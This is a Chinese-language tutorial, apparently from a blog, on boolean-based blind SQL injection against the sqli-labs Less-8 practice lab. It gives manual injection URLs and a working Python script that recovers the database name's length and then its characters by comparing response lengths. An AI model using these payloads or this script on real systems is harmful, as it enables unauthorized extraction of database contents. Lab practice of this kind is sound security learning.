简单的exp编写
不写注释的代码,都是在耍流氓,而我不想做个女流氓
场景: sqli-labs-master Less-8
1.判断注入类型
http://localhost/sqli-labs-master/Less-8/?id=1' and 1=1--+
http://localhost/sqli-labs-master/Less-8/?id=1' and 1=2--+
2.判断列数
http://localhost/sqli-labs-master/Less-8/?id=1' order by 3--+
3. 判断数据库长度
http://localhost/sqli-labs-master/Less-8/?id=1' and length(database())=8--+
4. 判断数据库名字
http://localhost/sqli-labs-master/Less-8/?id=1' and substr(database(),1,1)='s'--+
substr 从第一位开始截取,截取一位
#!/usr/bin/python
#1.制造payload
#2.根据数据库的长度 and length(database())=8#
#3.根据数据库的名字 and substr(database(),1,1)='s'#
import requests
#a-Z的包
import string
# Base URL of the lab page. Each probe is appended to the `id=1` query
# value so the injected text lands inside the SQL string literal.
url = "http://localhost/sqli-labs-master/Less-8/?id=1"
# Accumulates the recovered database name, one character per iteration.
database_name = ''
def exp(payload_url):
    """Request *payload_url* and return the length of the response body.

    The script uses the body length as a boolean oracle: a probe whose
    response length equals that of the unmodified request is treated as
    "condition true" (see the comparisons in the ``__main__`` block).
    From a monitoring standpoint this produces a burst of requests to one
    path that differ only in the ``id`` parameter, which access logs and
    WAF rules can pick out.

    Args:
        payload_url: full URL, query string included, to fetch.

    Returns:
        Number of characters in the decoded response body.
    """
    response = requests.get(payload_url)
    body = response.text
    return len(body)
# 定义入口
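if __name__ == '__main__':
    # Baseline: body length of the unmodified request. Every probe below is
    # judged by whether its body length matches this value. Uses exp() so the
    # baseline and the probes are measured the same way.
    normal_len = exp(url)

    # Stage 1: find the length of the database name by trying 1..19 with
    # `and length(database())=<i>` appended.
    db_len = None
    for i in range(1, 20):
        # str() because i is an int; the escaped quote closes the original
        # string literal and %23 is a URL-encoded '#' comment marker.
        length_payload = "\'and length(database())=" + str(i) + "%23"
        if exp(url + length_payload) == normal_len:
            db_len = i
            print("The database length is %d" % i)
            break

    # Stage 2: recover the name one position at a time. Guarded on db_len:
    # the original fell through with i == 19 when stage 1 found nothing.
    if db_len is None:
        print("Could not determine the database length")
    else:
        for x in range(1, db_len + 1):
            for y in string.ascii_lowercase:
                char_payload = "\'and substr(database()," + str(x) + ",1)=\'" + y + "\'%23"
                if exp(url + char_payload) == normal_len:
                    # Append the matched character and move to the next position.
                    database_name += y
                    print("the databasename is %s" % database_name)
                    break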
运行截图